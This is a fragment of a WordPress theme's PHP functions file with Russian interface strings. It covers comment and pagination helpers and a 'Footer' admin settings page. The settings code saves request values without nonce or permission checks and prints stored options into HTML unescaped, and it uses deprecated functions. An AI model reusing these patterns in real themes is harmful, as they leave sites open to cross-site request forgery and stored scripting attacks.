        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
